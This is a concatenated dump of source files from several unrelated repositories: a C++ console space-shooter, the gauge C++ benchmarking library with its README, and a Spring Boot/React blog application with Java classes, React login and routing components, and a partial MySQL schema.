BasicEnemy::setCol(int col) { m_col = col; } 
ShootingEnemy::ShootingEnemy(int row, int col) { m_row = row; m_col = col; } int ShootingEnemy::getRow() { return m_row; } int ShootingEnemy::getCol() { return m_col; } void ShootingEnemy::setCol(int col) { m_col = col; } <file_sep>/Space-Game/Space-Game/spaceGame.cpp #include "createWorld.h" bool gameOver = false; int main() { //Create a new GameWorld object GameWorld* world = new GameWorld(); //Initialize the level, timer for how often enemies move, and the start direction int level = 1; int moveEnemyTimer = 5; int timer = 0; enemDir enemDirection = RIGHT; world->createBoard(to_string(level)); world->levelBeginMessage(to_string(level)); //While the player is alive and hasn't completed the level nor tried to exit while (world->getLives() > 0 && !world->isExit()) { world->updateBoard(); //Move the player world->movePlayer(); //Move the enemy if the timer has reached the enemy timer if (timer == moveEnemyTimer) { world->moveEnemy(enemDirection); timer = 0; } //Give a chance for the enemy to shoot world->enemyShoot(); //Move all current bullets world->moveBullet(); //Check if the level is complete world->checkIfComplete(); //Update the game board if viable if (world->isHit()) { world->hitMessage(); if (world->isAlive()) { world->createBoard(to_string(level)); enemDirection = RIGHT; timer = 0; } } //If the player has beat the level, update the level else if (world->isLevelComplete()) { world->levelCompleteMessage(to_string(level)); level++; world->levelBeginMessage(to_string(level)); world->createBoard(to_string(level)); enemDirection = RIGHT; timer = 0; } timer++; } return 1; }
6e04a1c5bb00dfc9d7f9efd7dd2145fea61fd30e
[ "C++" ]
5
C++
seddiekim/SpaceGame
dc93ecaef80c46e3a5766d03c056dba9fce260e9
fe61beb03f6973a0f0eb14a3bae3689b2dfa6857
refs/heads/master
<repo_name>nestorjhernandezm/gauge<file_sep>/src/gauge/console_colors_unix.hpp /// Modified from <NAME>'s Hayai C++ Benchmark library /// See LICENSE.rst #pragma once #include <unistd.h> #include <cstdlib> #include <cstring> #include <cassert> #include "console_colors.hpp" namespace gauge { /// Makes it possible to disable terminal colors /// by running: /// /// export TERM=dumb /// /// @return true if the terminal supports colors inline bool has_colors() { if (::isatty(STDOUT_FILENO)) { char* term = ::getenv("TERM"); if (term && ::strcmp(term, "dumb")) return true; } return false; } /// Static helper class for outputting to a terminal/console. class console_impl { public: static int color_code(const console::textcolor& color) { int c = 0; switch (color) { case console::textblack: c = 30; break; case console::textblue: c = 34; break; case console::textgreen: c = 32; break; case console::textcyan: c = 36; break; case console::textred: c = 31; break; case console::textpurple: c = 35; break; case console::textyellow: c = 33; break; case console::textwhite: c = 37; break; default: assert(0); } return c; } static void print_color(std::ostream& stream, const console::textcolor& color) { if (!has_colors()) return; if (color == gauge::console::textdefault) stream << "\033[m"; else stream << "\033[0;" << color_code(color) << "m"; } }; } <file_sep>/README.rst gauge ----- .. image:: https://travis-ci.org/steinwurf/gauge.svg?branch=master :target: https://travis-ci.org/steinwurf/gauge gauge is a flexible C++ benchmarking tool. .. contents:: Table of Contents: :local: Build ----- We use the ``waf`` build system to build the gauge static library. We have some additional tools which may be found at waf_ .. 
_waf: https://github.com/steinwurf/waf If you already installed a C++14 compiler, git and python on your system, then you can clone this repository to a suitable folder:: git clone <EMAIL>:steinwurf/gauge.git Configure and build the project:: cd gauge python waf configure python waf build Run the unit tests:: python waf --run_tests You should now have the gauge static lib and also its dependencies compiled as static libs. When building the static lib, waf will also build the ``gauge_example`` executable. Depending on your platform you should be able to launch it by running:: ./build/linux/examples/sample_benchmarks/gauge_example Example Use ----------- See various use cases in the ``examples`` folder. The following will be used to explain the basic concepts of gauge. To try it out save the following code in a file called ``main.cpp``:: #include <gauge/gauge.hpp> #include <vector> BENCHMARK(MyTest, RunThis, 100) { std::vector<int> integers; for(int i = 0; i < 2048; ++i) { integers.push_back(i); } // This is where the clock runs RUN { for(uint i = 1; i < integers.size(); ++i) { integers[i] += integers[i-1]; } } } int main(int argc, const char* argv[]) { gauge::runner::add_default_printers(); gauge::runner::run_benchmarks(argc, argv); return 0; } In the above we use the ``BENCHMARK`` macro which takes 3 parameters: 1. The name of the test-case in this case ``MyTest`` 2. The name of the benchmark in this case ``RunThis`` 3. The number of runs to complete in this case 100. The measurement will not start until we hit the ``RUN`` macro. Depending on the type of benchmark (the default is time) the code inside ``RUN`` will be executed several times (we refer to this as the number of iterations). When gauge is satisfied with the measurement we exit the run loop. For every ``BENCHMARK`` we may only call ``RUN`` once. 
Using ``g++`` the example code may be compiled as:: g++ main.cpp -o benchmark --std=c++14 -I../path_to_gauge/ -L../path_to_libguage -lgauge -ltables You should now be able to run the benchmark using:: ./benchmark License ------- gauge is available under the BSD license, see the LICENSE.rst file. Credits ------- We have create gauge to fit our specific purpose, however we hope that others may also find it useful. When designing gauge we found inspiration in these other nice projects: * Qt's benchmark tools part of QTestLib_. * <NAME>'s Hayai_ C++ benchmark tool, who also provided the nice terminal colors. * The `Google Test`_ framework. .. _QTestLib: http://qt-project.org/doc/qt-4.8/qtestlib-tutorial5.html .. _Hayai: https://github.com/nickbruun/hayai .. _`Google Test`: http://code.google.com/p/googletest/ Thanks for all the fish.
f4e708ec06ac096c883f58fe3713a83cedcb6935
[ "C++", "reStructuredText" ]
2
C++
nestorjhernandezm/gauge
9c0556cc45d4f3d72aeec796320a4eb67ae62803
b632ad4360af28cd1c4fd172e9d43baad789b1c9
refs/heads/master
<file_sep>#!/usr/bin/env ruby -wKU # TODO: Output-Methoden für File- und Line-Collections, Tabellen, success & failure inkl. optionaler Colorierung. %w(collection core_ext latex version).each do |_module| require File.join(File.dirname(__FILE__), "sherlock", _module) end module Sherlock module InstanceMethods def collect_files_matching(*args) Sherlock::Collection::Files.new(*args) end alias investigate collect_files_matching end class << self def included(base) base.__send__(:include, InstanceMethods) end include InstanceMethods alias [] collect_files_matching end end<file_sep>#!/usr/bin/env ruby -wKU sub_dir = File.basename(__FILE__, '.rb') all_files = Dir[File.join(File.dirname(__FILE__), sub_dir, '*.rb')] all_files.sort.map { |f| File.basename(f, '.rb') }.each do |_module| require File.join(File.dirname(__FILE__), sub_dir, _module) end <file_sep>require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Sherlock::Collection::Files do def numbered_lines text_files(:only => /lines/).lines(/^.*(\d+\.)(.+)/) end describe "#initialize" do it "creates an collection of lines looking like numbered lists" do lines = numbered_lines lines.should_not be_empty end end describe "#filter" do it "filters a collection of lines" do lines = numbered_lines new_lines = lines.filter(:except => /^\d\./) lines.count.should be > new_lines.count end end describe "#gsub" do it "modifies a collection of lines" do lines = numbered_lines new_lines = lines.gsub(/^(.*)(\d+)(\..+)/) do |match| "X #{match}" end new_lines.each do |line| line.changed?.should == true end end end end<file_sep>#!/usr/bin/env ruby -wKU # this is still very experimental # # I want to be able to perform large LaTeX document analysis in an easy readable way # e.g. 
# Sherlock[:tex].inputs(:except => 'generated') # # => all lines with input directives, except the ones containing 'generated' # Sherlock[:tex].macros(:emph) # # => all lines containing the \emph{} macro # # Maybe even environments could be analysed (e.g. figure and tabular) # module Sherlock module LaTex #:nodoc: class << self def included(base) base.__send__(:include, InstanceMethods) Sherlock::Collection::Files.__send__(:include, Collection::Files::InstanceMethods) end end module InstanceMethods def tex_files(opts = {}) investigate('**/*.tex', opts) end end module Collection module Files module InstanceMethods def collect_macros(pattern) collect(/\\(#{pattern})(\{([^\}]+)\})*/) end alias macros collect_macros def inputs(opts = {}) macros(:input).filter(opts) end def tagged(with_tag) tag_prefix = "%%!!" arr = [with_tag].flatten.map { |tag| "#{tag_prefix} #{tag}" } containing(arr) end def not_tagged(with_tag) tag_prefix = "%%!!" arr = [with_tag].flatten.map { |tag| "#{tag_prefix} #{tag}" } not_containing(arr) end end end end end end<file_sep>#!/usr/bin/env ruby -wKU module Sherlock module Collection class Base < Array def initialize(arr = [], opts = {}) super(0) self.concat filter_array_by_options(arr, opts) end # Returns the first value of the collection (matching the value, if given). def first(*value) item = if value.empty? super else filter(value)[0] end new([item]) end # Returns a collection with all files matching the # given pattern. def select_items_matching(*pattern) opts = pattern.last.is_a?(Hash) ? pattern.pop : {} pattern = [pattern].flatten arr = select { |f| pattern.empty? || matching?(f, pattern) } arr = filter_array_by_options(arr, opts) new(arr, opts) end alias filter select_items_matching # Filters the collection, if the first argument is an Array, Regexp, String or Hash. 
def [](value, *args) case value when String, Regexp, Array, Hash filter(value, *args) else super(value) end end def -(other) new(super) end def +(other) new(super.uniq) end def &(other) new(super) end def |(other) new(super) end private def filter_array_by_options(arr, opts = {}) arr = arr.select { |f| matching?(f, opts[:only]) } if opts[:only] arr = arr.reject { |f| matching?(f, opts[:except]) } if opts[:except] arr end def matching?(obj, string_or_regexp_or_array) [string_or_regexp_or_array].flatten.detect { |pattern| obj.match(pattern) } end def new(*args) self.class.new(*args) end end end end <file_sep>require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Sherlock::Collection::Files do def some_line lines = text_files.lines('Zeile') lines[0] end describe "#initialize" do it "should be an unchanged line" do some_line.changed?.should == false end end describe "#gsub" do it "modifies a line" do line = some_line new_line = line.gsub(/^(.*)/, 'X \1') new_line[0..0].should == 'X' new_line.changed?.should == true line[0..0].should_not == 'X' line.changed?.should == false end end end <file_sep># encoding: utf-8 require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Sherlock::Collection::Base do def new_collection(arr = nil, opts = {}) arr ||= %w(eins zwei drei vier fünf) Sherlock::Collection::Base.new(arr, opts) end def filter_arguments [ [['ei']], [[/ei/]], [['sieben', 'sechs', 'fünf', 'vier']], [[/ei/, 'fünf'], {:only => /ei$/, :except => 'zwei'}], [{:only => /ei$/, :except => 'zwei'}], ] end describe "#initialize" do it "creates an empty collection without arguments" do empty_collection = Sherlock::Collection::Base.new empty_collection.should be_empty end it "creates a full collection for a given array" do collection = new_collection([:foo, :bar]) collection.should_not be_empty end it "creates a full collection for a given collection" do collection = new_collection(new_collection) collection.should_not be_empty end end 
describe "#first" do it "should give a collection with the first matching element for a string" do collection = new_collection.first('ei') collection.should == new_collection(%w(eins)) end it "should give a collection with the first matching element for a regexp" do collection = new_collection.first(/ei/) collection.should == new_collection(%w(eins)) end it "should give a collection with the first matching element for an array of strings" do collection = new_collection.first(%w(sieben sechs fünf)) collection.should == new_collection(%w(fünf)) end it "should give a collection with the first matching element for an array of regexps" do collection = new_collection.first([/sieben/, /sechs/, /fünf/]) collection.should == new_collection(%w(fünf)) end it "should give a collection with the first matching element for an array of strings and regexps" do collection = new_collection.first([/sieben/, /sechs/, 'fünf']) collection.should == new_collection(%w(fünf)) end end describe "#filter" do # without real arguments it "should give the same collection without arguments" do collection = new_collection.filter collection.should == new_collection end it "should give the same collection with empty arguments" do collection = new_collection.filter([], {}) collection.should == new_collection end # without options it "should give a collection with the matching elements for a string" do collection = new_collection.filter('ei') collection.should == new_collection(%w(eins zwei drei)) end it "should give a collection with the matching elements for a regexp" do collection = new_collection.filter(/ei/) collection.should == new_collection(%w(eins zwei drei)) end it "should give a collection with the matching elements for an array of strings" do collection = new_collection.filter(%w(sieben sechs fünf vier)) collection.should == new_collection(%w(vier fünf)) end it "should give a collection with the matching elements for an array of regexps" do collection = new_collection.filter([/ei/, /sechs/, 
/fünf/]) collection.should == new_collection(%w(eins zwei drei fünf)) end it "should give a collection with the matching elements for an array of strings and regexps" do collection = new_collection.filter([/ei/, 'fünf']) collection.should == new_collection(%w(eins zwei drei fünf)) end # with options it "should accept options as only argument" do collection = new_collection.filter(:except => 'zwei') collection.should == new_collection(%w(eins drei vier fünf)) end it "should accept options as only argument (chained)" do collection = new_collection.filter([/ei/, 'fünf']).filter(:except => 'zwei') collection.should == new_collection(%w(eins drei fünf)) end it "should filter results with :except option" do collection = new_collection.filter([/ei/, 'fünf'], :except => 'zwei') collection.should == new_collection(%w(eins drei fünf)) end it "should filter results with :only option" do collection = new_collection.filter([/ei/, 'fünf'], :only => /ei$/) collection.should == new_collection(%w(zwei drei)) end it "should filter results with :only option first and :except option afterwards" do collection = new_collection.filter([/ei/, 'fünf'], :only => /ei$/, :except => 'zwei') collection.should == new_collection(%w(drei)) end end describe "#[]" do it "should be a shortcut for 'filter'" do filter_arguments.each do |args| new_collection[*args].should == new_collection.filter(*args) end end end describe "#+" do it "should combine two collections" do collection1 = new_collection(nil, :only => 'eins') collection2 = new_collection(nil, :only => 'zwei') result = collection1 + collection2 result.should == new_collection(%w(eins zwei)) end end describe "#-" do it "should reduce two collections" do collection1 = new_collection(nil, :only => /ei/) collection2 = new_collection(nil, :only => 'zwei') result = collection1 - collection2 result.should == new_collection(%w(eins drei)) end end # TODO: tests for #& und #| end<file_sep>#!/usr/bin/env ruby -wKU module Sherlock module Collection class 
Lines < Base # Executes gsub on all lines in the collection and returns # the modified collection. def gsub(*args, &block) arr = map { |line| line.gsub(*args, &block) } new(arr) end # Returns an array of the lines' match_data objects without the # 'overall' match (the first element of the MatchData object). def matches map { |line| line.match_data[1..line.match_data.length-1] } end def new(arr, opts = {}) # :nodoc: self.class.new(arr) end def save! sort_by { |line| line.line_number }.reverse.each(&:save!) end def to_s map { |line| (line.changed? ? '[C] ' : '[ ] ') + line.inspect }.join("\n") end alias inspect to_s end end end<file_sep>#!/usr/bin/env ruby -wKU $:.unshift(File.join(File.dirname(__FILE__), "..", "lib")) require 'sherlock' require 'rubygems' require 'rspec' require 'fileutils' def text_files(opts = {}) Sherlock::Collection::Files.new('**/*.txt', opts) end def rebuild_test_data_dir! FileUtils.rm_rf(test_data_dir) FileUtils.mkdir_p(test_data_dir) FileUtils.cp_r(original_test_data_dir, tmp_dir) end def original_test_data_dir File.join(File.dirname(__FILE__), 'fixtures') end def test_data_dir File.join(tmp_dir, 'fixtures') end def tmp_dir File.join(File.dirname(__FILE__), '..', 'tmp') end RSpec.configure do |config| config.before(:each) { rebuild_test_data_dir! Dir.chdir(test_data_dir) } end<file_sep> class ::Object #:call-seq: # obj.full? # obj.full? { |f| ... } # # Returns wheter or not the given obj is not blank?. # If a block is given and the obj is full?, the obj is yielded to that block. # # salary = nil # salary.full? # => nil # salary.full? { |s| "#{s} $" } # => nil # salary = 100 # salary.full? { |s| "#{s} $" } # => "100 $" # # With ActiveSupport's implementation of Symbol#to_proc it is possible to write: # # current_user.full?(&:name) # => "Dave" def full? f = blank? ? nil : self if block_given? and f yield f else f end end end class ::Symbol # Turns the symbol into a simple proc, which is especially useful for enumerations. 
Examples: # # # The same as people.collect { |p| p.name } # people.collect(&:name) # # # The same as people.select { |p| p.manager? }.collect { |p| p.salary } # people.select(&:manager?).collect(&:salary) # # (borrowed from ActiveSupport) def to_proc Proc.new { |*args| args.shift.__send__(self, *args) } end unless method_defined?(:to_proc) end <file_sep>$:.unshift('lib') require 'sherlock/version' Gem::Specification.new do |s| s.author = "<NAME>" s.email = '<EMAIL>' s.homepage = "http://github.com/rrrene/sherlock" s.name = 'sherlock' s.version = Sherlock::VERSION::STRING.dup s.platform = Gem::Platform::RUBY s.summary = "A library for filtering lists of files and performing actions on their content." s.description = "A library for filtering lists of files and performing actions on their content." s.files = Dir[ 'lib/**/*', 'spec/**/*'] s.require_path = 'lib' s.requirements << 'none' s.add_development_dependency 'rake' s.add_development_dependency 'rspec' end<file_sep>#!/usr/bin/env ruby -wKU module Sherlock module Collection # ==== Attributes # # * <tt>:file</tt> # * <tt>:line_number</tt> # * <tt>:pattern</tt> # class MatchedLine < String attr_accessor :attributes def initialize(line, _attributes = {}) super(line) self.attributes = {:original => line}.merge(_attributes) end def changed? attributes[:original] != self end def gsub(*args, &block) self.class.new(super, attributes) end def match_data attributes[:pattern].each do |p| if m = self.match(p) return m end end nil end def method_missing(m) if attributes && value = attributes[m.to_s.intern] value else super end end def save! 
all_lines = File.open(file, 'r') { |f| f.readlines } index = line_number - 1 if original == all_lines[index] all_lines[index] = self.to_s else raise "File seems modified: #{file}" end File.open(file, 'w') {|f| f.write(all_lines) } end end end end<file_sep>#!/usr/bin/env ruby -wKU module Sherlock module Collection class Files < Base def initialize(glob_or_regex, opts = {}) case glob_or_regex when Hash opts = glob_or_regex when Array opts[:arr] = glob_or_regex when String opts[:glob] = glob_or_regex when Symbol opts[:glob] = "**/*.#{glob_or_regex}" when Regexp if opts[:only] raise "Cannot use regexp and :only-option at the same time." else opts[:only] = glob_or_regex end end opts = {:glob => '**/*'}.merge(opts) arr = opts[:arr] || Dir[opts[:glob]] super(arr, opts) end # Returns a Lines collection with all lines containing the # given content / matching the given pattern. def collect_lines_matching(pattern = //, &block) pattern = [pattern].flatten lines = Lines.new self.each { |f| io = File.open(f) io.each { |line| if matching?(line, pattern) lines << MatchedLine.new(line, :file => f, :line_number => io.lineno, :pattern => pattern) end } } lines end alias lines collect_lines_matching def not_blank_lines lines(/\S+/) end def blank_lines lines(/^\s+$/) end # Returns a Files collection with all files containing the # given content / matching the given pattern. def select_files_containing(pattern) select_files(pattern, :select) end alias containing select_files_containing # Returns a Files collection with all files not containing the # given content / matching the given pattern. 
def select_files_not_containing(pattern) select_files(pattern, :reject) end alias not_containing select_files_not_containing private def select_files(pattern, method) pattern = [pattern].flatten arr = send(method) { |f| matching?(File.read(f), pattern) } new(arr) end end end end <file_sep>require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Sherlock::Collection::Files do def filtered_by_initialize(filter = {:only => /lines/}) text_files(filter) end describe "#initialize" do it "creates an collection of all text files" do files = text_files files.should_not be_empty end it "filters text files by name" do filtered_by_method = text_files.filter(:only => /lines/) filtered_by_initialize.should == filtered_by_method end it "should accept a glob (String) as first argument" do Sherlock['**/*.txt'].should == Dir['**/*.txt'] end it "should accept a Symbol as first argument" do files = Sherlock[:txt] files.should == Sherlock["**/*.txt"] end it "should accept a Regexp as first argument" do Sherlock[/\.txt$/].should == Sherlock['**/*.txt'] end end describe "#lines" do it "collects all lines beginning with a number and a dot." do lines = text_files(:only => /lines/).lines(/^\d+\./) lines.should_not be_empty end it "tries to collect all lines beginning with a number and a dot." 
do lines = text_files(:except => /lines/).lines(/^\d+\./) lines.should be_empty end end describe "#select_files_containing" do it "selects all text files containing numbered lists" do files = text_files.containing(/^.*\d+\./) files.should_not be_empty files.should == text_files(:only => 'lines.txt') end end describe "#select_files_not_containing" do it "selects all text files not containing numbered lists" do files = text_files.not_containing(/^.*\d+\./) files.should_not be_empty files.should == text_files(:except => 'lines.txt') end end end<file_sep># Sherlock ## Description Sherlock provides an easy way to filter collections of files and report/modify/save specific lines using ruby. ## Installation $ gem install sherlock ## Usage The Sherlock brackets accessor takes a glob as first argument, just like Dir: # Select all tex files Dir['**/*.tex'] Sherlock['**/*.tex'] And you can filter this collection, just like with Dir: # Select all tex files beginning with 'chapter' except chapter 0 Dir['**/*.tex'].select { |f| f =~ /chapter_/ }.reject { |f| f == 'chapter_0' } Sherlock['**/*.tex', {:only => /chapter_/, :except => 'chapter_0'}] But you can also easily filter file collections by their content and report/modify/save specific lines of text. # Select all ruby files, comment all lines using 'puts' (except those lines that are already commented) and save the changes. Sherlock['**/*.rb'].lines(/puts/).filter(:except => /^#/).gsub(/.+/) { |line| "# #{line}" }.save! 
## Collecting files To filter this set of files further, use the options parameter: Sherlock['**/*.tex', {:only => /^\d+/, :except => /table_of_contents/}) or you can use the filter method: Sherlock['**/*.tex'].filter(:only => /^\d+/, :except => /table_of_contents/) The fitler method also takes a String, Regexp or Array as parameter (which is then interpreted as :only option): app = Sherlock['app/**/*.rb'] models = app.filter(/models/) views = app.filter(/views/) controllers = app.filter(/controllers/) which is aliased as []: app = Sherlock['app/**/*.rb'] models = app[/models/] views = app[/views/] controllers = app[/controllers/] The containing and not_containing methods can be used to filter file collections based on their content: Sherlock['app/**/*.rb'].containing('TODO:') ## Collecting lines Like the namesake of this module, we often want to dig deeper and investigate further: Sherlock['**/*.tex'] # => Sherlock::Collection::Files Sherlock['**/*.tex'].lines(/% TODO:(.+)/) # => Sherlock::Collection::Lines This returns a collection of lines that matched the given argument. To get the matched part of the line, you can use the matches method: Sherlock['**/*.tex'].lines(/% TODO:(.+)/).matches # => [['improve headline'], ['write conclusion'], ['get an A']] ## Modifying lines Finally, you want to be able to not only use your findings, but change the content of the collected lines. You can using the gsub and save! method: Sherlock['**/*.tex'].lines(/% URGENT:/).gsub('URGENT', 'TODO').save! gsub and save! work both on collections of lines as well as individual line objects! ## Filtering in general All filtering methods, such as filter, first, containing and not_containing, accept the :only and :except options (or a single argument which is interpreted as :only option). 
files = Sherlock['**/*.rb'] files.filter(:only => 'controllers') == files.filter('controllers') files.filter(/(models|controllers)/) == files.filter(%w{models controllers}) Values provided to these options can be a Regexp, a String or an Array of Regexps/Strings. ## License Released under the MIT License. See the LICENSE file for further details. <file_sep>require File.expand_path(File.dirname(__FILE__) + '/spec_helper') describe Sherlock do describe "#investigate" do it "creates a collection of all text files" do files = Sherlock.investigate('**/*.txt') files.should_not be_empty end it "creates an empty collection" do files = Sherlock.investigate('**/not-there') files.should be_empty end end end<file_sep>#!/usr/bin/env ruby -wKU require File.join(File.dirname(__FILE__), 'lib', 'sherlock') include Sherlock include Sherlock::LaTex require 'irb' require 'irb/completion' IRB.start
8e85d1d863a8c6b8b70c961cd57a829bf37a6c08
[ "Markdown", "Ruby" ]
17
Ruby
rrrene/sherlock
607950dfaef32d6ce04f369b54e7b4bb00143053
8a775d507dc494c30781079003656c616e4bd7cd
refs/heads/master
<repo_name>zwbsdmpy/springboot_blogs<file_sep>/blogs/src/redux/actionCreater.js import * as actionType from './actionType.js' import axios from "axios"; export const login = (data) => { return (dispatch) => { axios.post('/users/login', data).then( (res) => { if (res.status === 200) { console.log("userdata:" + JSON.stringify(res)); const userData = res.data; dispatch({ type: actionType.USER_DATA, userData, }) } } ).catch( () => { alert("登录失败!") } ) } }; <file_sep>/src/test/java/com/springboot_blog/log/LoggerTest.java /** * FileName: LoggerTest * Author: zwbsdmpy * Date: 2020/1/27 22:41 * Description: * History: */ package com.springboot_blog.log; import org.junit.Test; import org.junit.runner.RunWith; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.boot.test.context.SpringBootTest; import org.springframework.test.context.junit4.SpringRunner; /** * 〈〉 * * @author zwb * @create 2020/1/27 * @since 1.0.0 */ @RunWith(SpringRunner.class) @SpringBootTest public class LoggerTest { private Logger logger = LoggerFactory.getLogger(LoggerTest.class); @Test public void testLog() { logger.trace("这是 info 级别"); logger.debug("这是 debug 级别"); logger.info("这是 info 级别"); logger.warn("这是 warn 级别"); logger.error("这是 error 级别"); } } <file_sep>/blogs/src/redux/actionType.js /** * action type名称常量 */ export const LOGIN = 'login'; export const USER_DATA = 'userData'; <file_sep>/blogs/src/container/Login.jsx import {connect} from "react-redux"; import LoginView from "../component/login/LoginView"; import * as action from "../redux/actionCreater"; const mapStateToProps = (state) => { return { userData: state.mainView.userData } } const mapDispatchToProps = (dispatch) => { return { login: (user) => dispatch(action.login(user)) } } export default connect(mapStateToProps, mapDispatchToProps)(LoginView) <file_sep>/src/main/java/com/util/JsonUtil.java package com.util; import com.fasterxml.jackson.core.JsonProcessingException; import 
com.fasterxml.jackson.databind.ObjectMapper; /** * Json工具类 * * @author zwbsdmpy */ public class JsonUtil { private JsonUtil () { } public static String obj2String (Object object) { if (object == null) { return null; } if (object instanceof String) { return object.toString (); } ObjectMapper mapper = new ObjectMapper (); try { return mapper.writeValueAsString (object); } catch (JsonProcessingException e) { e.printStackTrace (); } return ""; } } <file_sep>/blogs/src/component/login/LoginView.jsx import React, {Component} from "react"; import "./style.css"; import 'bootstrap/dist/css/bootstrap.css' import {Link} from "react-router-dom"; export default class LoginView extends Component { state = { userData: {}, account: "", password: "", Logging: false, isLogin: false, }; componentDidMount() { } componentWillReceiveProps(nextProps) { this.setState({userData: nextProps.userData}); } handleNameChange = (event) => { const account = event.target.value; this.setState({account}); }; handlePasswordChange = (event) => { const password = event.target.value; this.setState({password}); }; handleSubmit = (event) => { event.preventDefault(); const user = {"account": this.state.account, "password": <PASSWORD>}; this.props.login(user); if (this.state.userData !== {}) { const isLogin = true; this.setState({isLogin}); } }; render() { const {userData, isLogin, Logging} = this.state; let view = ''; if (!isLogin) { view = <div className=".container-fluid"> <div className="text-center align-items-center"> <div className="logo text-uppercase"> <span>SKIN.</span> <strong className="text-primary">BLOG</strong> </div> {/*<div className="text-center">*/} {/* 人类的悲欢并不相通*/} {/* 我只觉得他们吵闹*/} {/*</div>*/} <form className="text-center"> <div className="form-group-material"> <label htmlFor="userAccount" className="label-material">账号&nbsp;</label> <input id="userAccount" type="text" name="userAccount" required data-msg="请输入用户名" className="input-material" onChange={this.handleNameChange}/> </div> <div 
className="form-group-material"> <label htmlFor="password" className="label-material">密码&nbsp;</label> <input id="password" type="<PASSWORD>" name="loginPassword" required data-msg="请输入密码" className="input-material" onChange={this.handlePasswordChange}/> </div> <div className="form-group text-center"> <input type="submit" id="login" className="btn btn-primary" value="登录" onClick={this.handleSubmit}/> </div> </form> 忘记密码? < small> 没有账号? </small>注册 </div> </div> } else if (!Logging) { view = <div> LOADING...</div> } if (userData !== {} && isLogin) { view = <Link to='/Manager'/> } return ( view ) } } <file_sep>/src/main/java/com/model/UserResource.java package com.model; import com.domain.Article; import com.domain.Menu; import com.domain.User; import com.util.JsonUtil; import lombok.Data; import java.util.ArrayList; import java.util.List; /** * 用户资源 * * @author zwbsdmpy */ @Data public class UserResource { private User user; private Menu menu = new Menu (); private List<Article> articles = new ArrayList<> (); @Override public String toString () { return JsonUtil.obj2String (this); } } <file_sep>/src/main/java/com/domain/Article.java package com.domain; import lombok.Data; /** * @author zwbsdmpy */ @Data public class Article { private int articleId; private int userId; private String articleTitle; private String content; private int scanCount; private int likesCount; private int replyCount; } <file_sep>/blogs/src/AppRouter.js import {BrowserRouter, Route} from "react-router-dom"; import React from "react"; import Manager from "./container/Manager"; import Login from "./container/Login"; import IndexView from "./component/index/IndexView"; export default class AppRouter extends React.Component { render() { return ( <BrowserRouter> <Route path="/" exact component={IndexView}/> <Route path="/login" exact component= {Login}/> <Route path="/manager" exact component={Manager}/> </BrowserRouter> ) } } <file_sep>/blogs/src/component/common/CommonFooter.jsx import {Layout} 
from "antd"; import React from "react"; const {Footer} = Layout; export class CommonFooter extends React.Component { render() { return ( <Footer style={{textAlign: 'center'}}>zwbsdmpy Design ©2020 Created</Footer> ) } } <file_sep>/src/main/java/com/domain/Replay.java package com.domain; import lombok.Data; @Data public class Replay { private int replayId; private int articleId; private String content; private int owner; } <file_sep>/blogs/src/App.jsx import React from 'react'; import {Provider} from "react-redux"; import {store} from "./redux/store"; import AppRouter from "./AppRouter"; // 总入口 export default class App extends React.Component { render() { return ( <Provider store={store}> <AppRouter/> </Provider> ) } } <file_sep>/src/main/java/com/util/UriUtil.java package com.util; public class UriUtil { public static void parseUri(String uri){ } } <file_sep>/blogs/src/component/common/CommonHeader.jsx import React, {Component} from 'react'; import {Badge, Col, Menu, Row} from 'antd'; import MailOutlined from "@ant-design/icons/lib/icons/MailOutlined"; import AppstoreOutlined from "@ant-design/icons/lib/icons/AppstoreOutlined"; import SettingOutlined from "@ant-design/icons/lib/icons/SettingOutlined"; import {Avatar} from 'antd'; import {UserOutlined} from '@ant-design/icons'; import {Link} from "react-router-dom"; const {SubMenu} = Menu; export class CommonHeader extends Component { state = { current: 'mail', }; handleClick = e => { console.log('click ', e); this.setState({ current: e.key, }); }; render() { return ( <div className='header'> <Row> <Col span={18}> <Menu onClick={this.handleClick} selectedKeys={[this.state.current]} mode="horizontal"> <Menu.Item key="mail" icon={<MailOutlined/>}> Navigation One </Menu.Item> <Menu.Item key="app" icon={<AppstoreOutlined/>}> Navigation Two </Menu.Item> <SubMenu icon={<SettingOutlined/>} title="Navigation Three - Submenu"> <Menu.ItemGroup title="Item 1"> <Menu.Item key="setting:1">Option 1</Menu.Item> <Menu.Item 
key="setting:2">Option 2</Menu.Item> </Menu.ItemGroup> <Menu.ItemGroup title="Item 2"> <Menu.Item key="setting:3">Option 3</Menu.Item> <Menu.Item key="setting:4">Option 4</Menu.Item> </Menu.ItemGroup> </SubMenu> <Menu.Item key="alipay"> <a href="https://ant.design" target="_blank" rel="noopener noreferrer"> Navigation Four - Link </a> </Menu.Item> </Menu> </Col> <Col span={6}> <Col span={6}> <span className="avatar-item"> <Avatar shape="square" size='large' icon={<UserOutlined/>}/> </span> </Col> <Col span={6}> <h4><Link to='/login'>登录</Link>/注册</h4> </Col> </Col> </Row> </div> ) } } <file_sep>/src/main/resources/blogs.sql /* Navicat Premium Data Transfer Source Server : root Source Server Type : MySQL Source Server Version : 50727 Source Host : localhost:3306 Source Schema : blogs Target Server Type : MySQL Target Server Version : 50727 File Encoding : 65001 Date: 10/08/2020 23:35:40 */ SET NAMES utf8mb4; SET FOREIGN_KEY_CHECKS = 0; -- ---------------------------- -- Table structure for article -- ---------------------------- DROP TABLE IF EXISTS `article`; CREATE TABLE `article` ( `article_id` int(11) NOT NULL, `user_id` int(11) DEFAULT NULL, `article_title` varchar(30) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL, `content` longtext CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL, `scan_count` int(16) DEFAULT NULL, `likes_count` int(16) DEFAULT NULL, `reply_count` int(16) DEFAULT NULL, PRIMARY KEY (`article_id`) USING BTREE ) ENGINE = InnoDB CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Records of article -- ---------------------------- INSERT INTO `article` VALUES (10000, 10000, 'zwbsdmpy', '123456', 0, 0, 0); -- ---------------------------- -- Table structure for menu -- ---------------------------- DROP TABLE IF EXISTS `menu`; CREATE TABLE `menu` ( `menu_id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, `user_id` int(11) NOT NULL, `menu_type` varchar(255) CHARACTER SET utf8 COLLATE 
